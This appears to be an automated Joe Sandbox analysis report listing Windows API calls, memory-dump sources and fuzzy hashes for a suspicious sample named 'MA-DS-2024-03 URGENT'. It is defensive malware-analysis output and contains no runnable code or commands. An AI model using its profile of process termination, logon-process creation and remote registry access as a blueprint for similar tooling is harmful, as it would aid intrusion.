                                                        • Source File: 00000000.00000002.1287711947.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1670000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1414292761-0
                                                        • Opcode ID: f2fb4f3b0e36ad3dbb3fcdc9e343865699cefb63979dbb32952f94f1c56ad542
                                                        • Instruction ID: 428237976cf412f34526509a18a1f8df6b30978c7ca437adac4f4d17dd4acb72
                                                        • Opcode Fuzzy Hash: f2fb4f3b0e36ad3dbb3fcdc9e343865699cefb63979dbb32952f94f1c56ad542
                                                        • Instruction Fuzzy Hash: 2B51C172600226ABEB258E68CCC0EEB7BAAEB54650B154628FD06D7241FF74DCD0C754
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: _memmove$__itow__swprintf
                                                        • String ID:
                                                        • API String ID: 3253778849-0
                                                        • Opcode ID: 1f2fd32d1c09e4ca446b38a7b75ec12218465b447ddac1dcab588cb0eef34e6b
                                                        • Instruction ID: 21da70feb02ff46742cf7b1a596b1e1f747712b30ca55ffc0ed3d6fa2aea8e56
                                                        • Opcode Fuzzy Hash: 1f2fd32d1c09e4ca446b38a7b75ec12218465b447ddac1dcab588cb0eef34e6b
                                                        • Instruction Fuzzy Hash: 6261707160025A9BCF01EF61DC81AFE37A5AF05308F45452EF8556B293EB38AD05CB5A
                                                        APIs
                                                          • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                          • Part of subcall function 00480E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004802BD
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004802FD
                                                        • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00480320
                                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00480349
                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0048038C
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00480399
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                        • String ID:
                                                        • API String ID: 4046560759-0
                                                        • Opcode ID: f0a89fa1a40745d355cf2e381e9086d1a3da3f2401f8ea26238a9b70f405dec2
                                                        • Instruction ID: d871ff08e979a7a46cd08627f86c845b9cb8169993b1d7d4ad27b4e2648fe78e
                                                        • Opcode Fuzzy Hash: f0a89fa1a40745d355cf2e381e9086d1a3da3f2401f8ea26238a9b70f405dec2
                                                        • Instruction Fuzzy Hash: 68515C71118204AFC710EF65C885E6FBBE8FF85318F04492EF945972A2DB35E909CB56
                                                        APIs
                                                        • VariantInit.OLEAUT32(?), ref: 0045EF06
                                                        • VariantClear.OLEAUT32(00000013), ref: 0045EF78
                                                        • VariantClear.OLEAUT32(00000000), ref: 0045EFD3
                                                        • _memmove.LIBCMT ref: 0045EFFD
                                                        • VariantClear.OLEAUT32(?), ref: 0045F04A
                                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0045F078
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Variant$Clear$ChangeInitType_memmove
                                                        • String ID:
                                                        • API String ID: 1101466143-0
                                                        • Opcode ID: 3a696c756d5f9f21b3064a47137a411a2eda9f735d8382ec367d4cfec0c8664e
                                                        • Instruction ID: 3df6c570488be2a998a5abfaea7cf2d50daf9fdb1352742cca5bf42246c3e2d0
                                                        • Opcode Fuzzy Hash: 3a696c756d5f9f21b3064a47137a411a2eda9f735d8382ec367d4cfec0c8664e
                                                        • Instruction Fuzzy Hash: 04517D75A00209EFCB14CF58C884AAAB7B8FF4C314B15856AED49DB342E334E915CF94
                                                        APIs
                                                        • _memset.LIBCMT ref: 00462258
                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004622A3
                                                        • IsMenu.USER32(00000000), ref: 004622C3
                                                        • CreatePopupMenu.USER32 ref: 004622F7
                                                        • GetMenuItemCount.USER32(000000FF), ref: 00462355
                                                        • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00462386
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                        • String ID:
                                                        • API String ID: 3311875123-0
                                                        • Opcode ID: cf97df88117ddcc5f0fa513269a15dde7708b163d82bf74e49b6c8debfa24165
                                                        • Instruction ID: 667f6c59849a63ea2ae133147cac6ec600f1389f3bfda063d60b04a3024e98c7
                                                        • Opcode Fuzzy Hash: cf97df88117ddcc5f0fa513269a15dde7708b163d82bf74e49b6c8debfa24165
                                                        • Instruction Fuzzy Hash: 0F51A370500649FBDF21CF64CA44B9EBBF5BF05318F10456AE81197390E3B88985CB5B
                                                        APIs
                                                        • GetForegroundWindow.USER32(?,?,?,?,?,?,00474E41,?,?,00000000,00000001), ref: 004770AC
                                                          • Part of subcall function 004739A0: GetWindowRect.USER32(?,?), ref: 004739B3
                                                        • GetDesktopWindow.USER32 ref: 004770D6
                                                        • GetWindowRect.USER32(00000000), ref: 004770DD
                                                        • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0047710F
                                                          • Part of subcall function 00465244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004652BC
                                                        • GetCursorPos.USER32(?), ref: 0047713B
                                                        • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00477199
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                        • String ID:
                                                        • API String ID: 4137160315-0
                                                        • Opcode ID: 3cdeb131284200fba8ef2e28f13c3857e1f37640968ff1f5e935f4a9860c8469
                                                        • Instruction ID: 96178dbc809958a90b6454061f905f6e8cc6bb80431ab620535fad6e804f8cbf
                                                        • Opcode Fuzzy Hash: 3cdeb131284200fba8ef2e28f13c3857e1f37640968ff1f5e935f4a9860c8469
                                                        • Instruction Fuzzy Hash: 2131D472605305ABD720DF14D849B9FB7A9FF88314F40092EF58997291D734EA09CB9A
                                                        APIs
                                                          • Part of subcall function 004580A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004580C0
                                                          • Part of subcall function 004580A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004580CA
                                                          • Part of subcall function 004580A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004580D9
                                                          • Part of subcall function 004580A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004580E0
                                                          • Part of subcall function 004580A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004580F6
                                                        • GetLengthSid.ADVAPI32(?,00000000,0045842F), ref: 004588CA
                                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 004588D6
                                                        • HeapAlloc.KERNEL32(00000000), ref: 004588DD
                                                        • CopySid.ADVAPI32(00000000,00000000,?), ref: 004588F6
                                                        • GetProcessHeap.KERNEL32(00000000,00000000,0045842F), ref: 0045890A
                                                        • HeapFree.KERNEL32(00000000), ref: 00458911
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                        • String ID:
                                                        • API String ID: 3008561057-0
                                                        • Opcode ID: 899df585734c4cf6e549910b9baf9cc1d52bbabddfc3f51843167315329ebb0f
                                                        • Instruction ID: 7059436e0a451666cc74b436c7695f43cca8d294219cfb63d8684b6348989bdb
                                                        • Opcode Fuzzy Hash: 899df585734c4cf6e549910b9baf9cc1d52bbabddfc3f51843167315329ebb0f
                                                        • Instruction Fuzzy Hash: 8E11AF71501609FFDB109FA4DC09BBFB7A8EB45316F10442EE845A7211CF3AAD18DB69
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 004585E2
                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 004585E9
                                                        • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 004585F8
                                                        • CloseHandle.KERNEL32(00000004), ref: 00458603
                                                        • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00458632
                                                        • DestroyEnvironmentBlock.USERENV(00000000), ref: 00458646
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                        • String ID:
                                                        • API String ID: 1413079979-0
                                                        • Opcode ID: 594d4e30fb024ea406b8e6751db59f03e6ebc423b2dce8d7814a5cb8bfdeea6b
                                                        • Instruction ID: 159165bab53b04d3cbba9e0d8ed23f629fb96fbb8b96a1f823f3c86320dce82d
                                                        • Opcode Fuzzy Hash: 594d4e30fb024ea406b8e6751db59f03e6ebc423b2dce8d7814a5cb8bfdeea6b
                                                        • Instruction Fuzzy Hash: 7111597250120DBBDF018FA4DD49BEF7BA9EF08305F144069FE04A2161CB769E69EB64
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287711947.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1670000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$_free$_abort
                                                        • String ID:
                                                        • API String ID: 3160817290-0
                                                        • Opcode ID: 5fe81c8c3265f0987d5b5a41027f32d70a249c20e2cfd1b09fbfaf4e5daf5913
                                                        • Instruction ID: 06d40485f0eb7e7f0d0eeea5c2376c200c85ff20ad0c194d9d45087eb34df926
                                                        • Opcode Fuzzy Hash: 5fe81c8c3265f0987d5b5a41027f32d70a249c20e2cfd1b09fbfaf4e5daf5913
                                                        • Instruction Fuzzy Hash: 73F0F9321406023AC32222797CF4EFA1697ABD7661F26413DF515D6385EF3188D2C318
                                                        APIs
                                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00420193
                                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 0042019B
                                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 004201A6
                                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 004201B1
                                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 004201B9
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 004201C1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Virtual
                                                        • String ID:
                                                        • API String ID: 4278518827-0
                                                        • Opcode ID: 8005da6f0a239fe7bb2d9a35262dc9c54b025e1879980d73ce2b9003a515eafd
                                                        • Instruction ID: 92342a6601e26d0a7fde7352a7d9a4d166513956845c1039e3d7dfd742296845
                                                        • Opcode Fuzzy Hash: 8005da6f0a239fe7bb2d9a35262dc9c54b025e1879980d73ce2b9003a515eafd
                                                        • Instruction Fuzzy Hash: BC016CB09017597DE3008F5A8C85B56FFA8FF19354F00411FA15C87941C7F5A868CBE5
                                                        APIs
                                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 004653F9
                                                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0046540F
                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 0046541E
                                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0046542D
                                                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00465437
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0046543E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                        • String ID:
                                                        • API String ID: 839392675-0
                                                        • Opcode ID: 0a014705f4b9eef04d7cbb572d47effba07f9213880d12d67749b825beda7cb3
                                                        • Instruction ID: 8521796c5e9ebcca20b77e734ec20d152baa00e403791343a5e797bd2ed800e1
                                                        • Opcode Fuzzy Hash: 0a014705f4b9eef04d7cbb572d47effba07f9213880d12d67749b825beda7cb3
                                                        • Instruction Fuzzy Hash: 7EF06231240558BBD3215B929C0DEAF7A7CEFC6B11F00057DF904D1050EBA41A0587B9
                                                        APIs
                                                        • InterlockedExchange.KERNEL32(?,?), ref: 00467243
                                                        • EnterCriticalSection.KERNEL32(?,?,00410EE4,?,?), ref: 00467254
                                                        • TerminateThread.KERNEL32(00000000,000001F6,?,00410EE4,?,?), ref: 00467261
                                                        • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00410EE4,?,?), ref: 0046726E
                                                          • Part of subcall function 00466C35: CloseHandle.KERNEL32(00000000,?,0046727B,?,00410EE4,?,?), ref: 00466C3F
                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00467281
                                                        • LeaveCriticalSection.KERNEL32(?,?,00410EE4,?,?), ref: 00467288
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                        • String ID:
                                                        • API String ID: 3495660284-0
                                                        • Opcode ID: 007701f69a9d5ed9de85b122c5e4605bf6e21b132c868c5f449004ca5f003f85
                                                        • Instruction ID: 24fb6cd7f7b8029ee4f25158e92bed301f8e8da2948c51d11c28ada49318010c
                                                        • Opcode Fuzzy Hash: 007701f69a9d5ed9de85b122c5e4605bf6e21b132c868c5f449004ca5f003f85
                                                        • Instruction Fuzzy Hash: DDF08236540A12EBD7111B64ED4C9DF7739FF45702B1009BAF503A10A0DB7F5819CB59
                                                        APIs
                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0045899D
                                                        • UnloadUserProfile.USERENV(?,?), ref: 004589A9
                                                        • CloseHandle.KERNEL32(?), ref: 004589B2
                                                        • CloseHandle.KERNEL32(?), ref: 004589BA
                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 004589C3
                                                        • HeapFree.KERNEL32(00000000), ref: 004589CA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                        • String ID:
                                                        • API String ID: 146765662-0
                                                        • Opcode ID: fc20ddc87a5fd273a18fa8ef1565cbc608650ceaa5a7efc3272966d010428556
                                                        • Instruction ID: 8deadb4208ce055a946e280c670b0e99f3db2db319c6731f307d9ea981cf4585
                                                        • Opcode Fuzzy Hash: fc20ddc87a5fd273a18fa8ef1565cbc608650ceaa5a7efc3272966d010428556
                                                        • Instruction Fuzzy Hash: 94E0C236004401FBDA011FE1EC0C90ABB69FB89322B108A38F219C1074CB32A828DB58
                                                        APIs
                                                        • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00492C7C,?), ref: 004576EA
                                                        • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00492C7C,?), ref: 00457702
                                                        • CLSIDFromProgID.OLE32(?,?,00000000,0048FB80,000000FF,?,00000000,00000800,00000000,?,00492C7C,?), ref: 00457727
                                                        • _memcmp.LIBCMT ref: 00457748
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: FromProg$FreeTask_memcmp
                                                        • String ID: ,,I
                                                        • API String ID: 314563124-4163367948
                                                        • Opcode ID: 53af9984063fa6ef4835f0a7eecfa6d9f4e13870cce121d0ca34c6a3126d00ff
                                                        • Instruction ID: be765e1d57b8148d1cf66b3d68047348fb9be163096bbb02cdfcec4a4c199039
                                                        • Opcode Fuzzy Hash: 53af9984063fa6ef4835f0a7eecfa6d9f4e13870cce121d0ca34c6a3126d00ff
                                                        • Instruction Fuzzy Hash: 08815D71A00109EFCB00DFA4D984EEEB7B9FF89315F204469F505AB251DB75AE0ACB64
                                                        APIs
                                                        • VariantInit.OLEAUT32(?), ref: 00478613
                                                        • CharUpperBuffW.USER32(?,?), ref: 00478722
                                                        • VariantClear.OLEAUT32(?), ref: 0047889A
                                                          • Part of subcall function 00467562: VariantInit.OLEAUT32(00000000), ref: 004675A2
                                                          • Part of subcall function 00467562: VariantCopy.OLEAUT32(00000000,?), ref: 004675AB
                                                          • Part of subcall function 00467562: VariantClear.OLEAUT32(00000000), ref: 004675B7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                        • API String ID: 4237274167-1221869570
                                                        • Opcode ID: b79f97b11a7d6962d372d0a4ccb284e4fc5bcf694c6e8e9d1ab55c8386d04fc1
